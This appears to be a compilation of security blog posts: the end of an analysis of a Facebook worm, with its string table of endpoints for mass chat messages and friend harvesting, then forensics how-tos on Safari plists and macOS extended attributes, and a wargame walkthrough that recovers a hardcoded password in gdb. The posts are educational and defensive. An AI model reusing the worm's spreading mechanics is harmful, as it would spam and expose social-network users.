"appendChild""body""data""firstChild""navAccountName""getElementById""?""/ajax/choose/?__a=1""event""AsyncRequest"

"/ajax/typeahead/first_degree.php?__a=1&viewer="

"&token=""&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha""length""push""getTime""setTime""getMonth""getDate""getFullYear""getHours"",""join""on""Create Event""new""/events/create.php""/ajax/chat/buddy_list.php?__a=1""substr""("")""buddy_list""payload""nowAvailableList""random""floor"

"%firstname%""toLowerCase""firstName""userInfos""replace""/ajax/chat/send.php?__a=1""/ajax/browser/friends/?uid=""&filter=all&__a=1&__d=1""shift""fetched friends: ""home""pop""%tf%""search""xhpc_message_text""xhpc_message""message text: ""/ajax/updatestatus.php?__a=1""profile"];

As I said, I'm not an expert in JavaScript, but some of the strings are messages that are to be posted somewhere, and the others are links and JavaScript commands requesting the creation of a group and the sending of chat messages to all the contacts, as well as browsing all the contacts, probably to « post » the creation of the group to everybody.

My analysis of the worm will not go further because I do not have much time, but it gives an idea of « how it works » and of what may happen to people who click everywhere and copy strange links on Facebook.

By the way: telling people they will know who viewed their profile seems very attractive to ordinary users, because I have received about 20 of these invitations by now. If someone goes further in the analysis, let me know; I would be pleased to read a « full » article on it.

How to avoid this? (conclusion)

  • Look at the kind of link pasted (if it looks strange, do not click on it).
  • If you don't really know what is going on, ask a friend to look at it with you (before clicking on anything).
  • In this case the « French » used is really bad; this may be a very good clue!
  • Having an up-to-date antivirus « may » / « could » / « should » help you.
  • If the link seems too obvious (a daughter had sex with her [whoever]): YES, IT'S A TRAP!
  • The cake is a lie, don't rely on it!

Please do not click on whatever link comes your way; this kind of link may do many things, such as allowing people to view your pictures or retrieve information you « set » as confidential, and many other things (limited only by the imagination of the hacker).

Forensics: Bookmarks.plist from Safari

I was reading some documents on Mac OS X forensics and was looking for a way to get Safari's Bookmarks.plist back, parse it and read it easily…

I knew that this file is located in the following folder:

~/Library/Safari/Bookmarks.plist

I thought that plist files were always XML documents and tried to read the file with Python; I opened Python and typed the following commands:

>>> import plistlib
>>> plistlib.readPlist('Bookmarks.plist')

Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 78, in readPlist
rootObject = p.parse(pathOrFile)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 405, in parse
parser.ParseFile(fileobj)
xml.parsers.expat.ExpatError: not well-formed (invalid token): line 1, column 9

Yeah ! Error …

I went back to my shell and tried to read it with

$ cat Bookmarks.plist

[...] it was not an XML output at all !

I went straight to developer.apple.com to find out how plists are used, and found out that some plist files are in

BINARY FORMAT PROPERTY LISTS

WTF ??

Luckily, the command to translate it to XML was given:

plutil -convert xml1 -o - Bookmarks.plist

I tried it, and it gave me a cool XML format.

I could then put the output of this command in an XML file and use it.
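The same job done entirely in Python, as an added example (not code from the post): the `readPlist` of Python 2.6 only understood the XML format, which is the ExpatError above, whereas `plistlib.loads` in Python 3 sniffs the format itself (binary plists start with the magic `bplist00`). The code below detects the format, re-serialises to XML the way `plutil -convert xml1 -o -` does, and walks the bookmark tree. The key names (`WebBookmarkType`, `Children`, `Title`, `URLString`, `URIDictionary`/`title`) are Safari's Bookmarks.plist layout as I know it; the bookmark file used here is constructed in that shape and written out in binary so there is something to sniff.

```python
import plistlib


def load_plist(data):
    """Parse plist bytes in either format. plistlib.loads() detects the format on its own;
    the magic check here only reports which one it was, for the analyst's notes."""
    fmt = "binary" if data.startswith(b"bplist00") else "xml"
    return plistlib.loads(data), fmt


def to_xml(data):
    """Equivalent of `plutil -convert xml1 -o - file.plist`: same content, as XML text."""
    obj, _ = load_plist(data)
    return plistlib.dumps(obj, fmt=plistlib.FMT_XML).decode()


def walk_bookmarks(node, folder=""):
    """Yield (folder_path, title, url) for every bookmark leaf, recursing through folders.
    Safari stores folders as WebBookmarkTypeList nodes with a Children array and leaves as
    WebBookmarkTypeLeaf nodes carrying URLString and URIDictionary.title."""
    kind = node.get("WebBookmarkType")
    if kind == "WebBookmarkTypeList":
        name = node.get("Title", "")
        sub = "%s/%s" % (folder, name) if name else folder
        for child in node.get("Children", []):
            yield from walk_bookmarks(child, sub)
    elif kind == "WebBookmarkTypeLeaf":
        title = node.get("URIDictionary", {}).get("title", "")
        yield folder, title, node.get("URLString", "")


def extract(data):
    """Return (format, [(folder, title, url), ...]) for a Bookmarks.plist read as bytes."""
    obj, fmt = load_plist(data)
    return fmt, list(walk_bookmarks(obj))


# Constructed sample in Safari's shape, serialised to the binary format like the real file.
SAMPLE_BOOKMARKS = {
    "WebBookmarkType": "WebBookmarkTypeList",
    "Title": "",
    "Children": [
        {"WebBookmarkType": "WebBookmarkTypeList", "Title": "BookmarksBar",
         "Children": [
             {"WebBookmarkType": "WebBookmarkTypeLeaf",
              "URLString": "http://developer.apple.com/",
              "URIDictionary": {"title": "Apple Developer"}},
         ]},
        {"WebBookmarkType": "WebBookmarkTypeLeaf",
         "URLString": "http://www.noktec.be/",
         "URIDictionary": {"title": "noktec"}},
    ],
}
SAMPLE_BINARY = plistlib.dumps(SAMPLE_BOOKMARKS, fmt=plistlib.FMT_BINARY)

if __name__ == "__main__":
    fmt, rows = extract(SAMPLE_BINARY)
    print("format:", fmt)
    for folder, title, url in rows:
        print("%-15s %-16s %s" % (folder or "/", title, url))
```

On a real image, read `~/Library/Safari/Bookmarks.plist` in binary mode and hand the bytes to `extract`; no `plutil` step is needed.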

Hidden password in an extended attribute

Today I was playing with some forensic challenges and got surprised by one of them. It went like this: « A password is hidden… but where? »

The file was an image, and my first idea was to try some steganography tools, but after a good hour of searching… I began to get very bored, and asked my friend Google about hidden data on OS X.

After a few minutes I found the answer: xattr, the EXTENDED ATTRIBUTES… they are somewhat similar to alternate data streams on Windows.

That is why I decided to explain how it works:

  • Open a shell and start Python
>>> import xattr
>>> xattr.listxattr("test.png")
(u'com.apple.metadata:kMDItemWhereFroms', u'user.comment')
>>>

As you may see… there are some attributes, and one of them is « user.comment »; after some research on the internet (1 min) I discovered how to print it out:

>>> xattr.getxattr("test.png", "user.comment")
'Password: XnHjst6&'
>>>

And the challenge was finished! It was the first time I saw extended attributes… and I found it very interesting.
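The two interactive calls above turned into a small triage routine, as an added Python example (not code from the post): it lists every extended attribute of a file or tree, decodes each value (text, or a binary plist, which is what `com.apple.metadata:kMDItemWhereFroms` holds: the download origin URLs), and marks the names that are not among the ones macOS writes routinely, so a `user.comment` stands out. On Linux the standard library's `os.listxattr`/`os.getxattr` are used; on macOS those do not exist and the code falls back to the third-party `xattr` module from the post. The `demo_list`/`demo_get` backend and the `test.png` attribute values are constructed stand-ins for the challenge file, so the scan runs without an xattr-capable filesystem.

```python
import os
import plistlib
from collections import namedtuple

Finding = namedtuple("Finding", "path name expected value")

# Attribute names macOS itself writes routinely; anything outside this set deserves a look.
COMMON_APPLE_XATTRS = {
    "com.apple.quarantine",
    "com.apple.metadata:kMDItemWhereFroms",
    "com.apple.metadata:kMDItemDownloadedDate",
    "com.apple.FinderInfo",
    "com.apple.ResourceFork",
    "com.apple.TextEncoding",
}


def _default_backend():
    """os.listxattr/os.getxattr exist on Linux; on macOS fall back to the `xattr`
    module used in the post (pip install xattr)."""
    if hasattr(os, "listxattr"):
        return os.listxattr, os.getxattr
    import xattr
    return xattr.listxattr, xattr.getxattr


def decode_value(raw):
    """Render an attribute value: binary plists are expanded (kMDItemWhereFroms is one),
    UTF-8 text is decoded, anything else is shown as hex."""
    if raw.startswith(b"bplist"):
        return plistlib.loads(raw)
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return raw.hex()


def scan_file(path, list_fn=None, get_fn=None):
    """Return one Finding per extended attribute on `path`; `expected` is False for names
    outside COMMON_APPLE_XATTRS."""
    if list_fn is None or get_fn is None:
        list_fn, get_fn = _default_backend()
    findings = []
    for name in list_fn(path):
        raw = get_fn(path, name)
        findings.append(Finding(path, name, name in COMMON_APPLE_XATTRS, decode_value(raw)))
    return findings


def scan_tree(root, list_fn=None, get_fn=None):
    """scan_file over every regular file below `root`."""
    out = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            out.extend(scan_file(os.path.join(dirpath, f), list_fn, get_fn))
    return out


def unexpected(findings):
    """The findings worth reading first: attributes macOS does not normally write."""
    return [f for f in findings if not f.expected]


# Constructed stand-in for the challenge file from the post.
DEMO_ATTRS = {
    "com.apple.metadata:kMDItemWhereFroms":
        plistlib.dumps(["http://example.invalid/test.png"], fmt=plistlib.FMT_BINARY),
    "user.comment": b"Password: XnHjst6&",
}


def demo_list(path):
    return list(DEMO_ATTRS)


def demo_get(path, name):
    return DEMO_ATTRS[name]


if __name__ == "__main__":
    for f in scan_file("test.png", demo_list, demo_get):
        flag = "" if f.expected else "  <-- unexpected"
        print("%s: %s = %r%s" % (f.path, f.name, f.value, flag))
```

In a real case read every attribute, not only the unexpected ones: `kMDItemWhereFroms` and `com.apple.quarantine` tell you where a file came from, which is often the question being asked. From the shell, `xattr -l test.png` on macOS shows the same data.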

Have fun.

Intruded Nº4

For the 4th one, we remember that there was a program called « level4 » in the /wargame folder; let's go to it.

First run:

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

Interesting… it looks like the 2nd challenge; let's disassemble the main part:

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type  to continue, or q  to quit---q
Quit

Again, we can take the interesting part:

0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 

Let's put a breakpoint on it and run it until it asks for the password:

Breakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ There is an interesting thing: I had to press « s » 3 times to arrive at my breakpoint (I should analyse this; anyway, let's continue) /!\

Let's see what's happening when we examine $esp:

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

OK, we got our password back, so let's go a bit further:

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd:	 "snlprintf\n"
(gdb)

OK… here there is a little trick: "snlprintf" is the password we are searching for;
they just put a C-function-like name as the string. The clue is the "\n" at the end of snlprintf ;)

Let's try the password:

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)
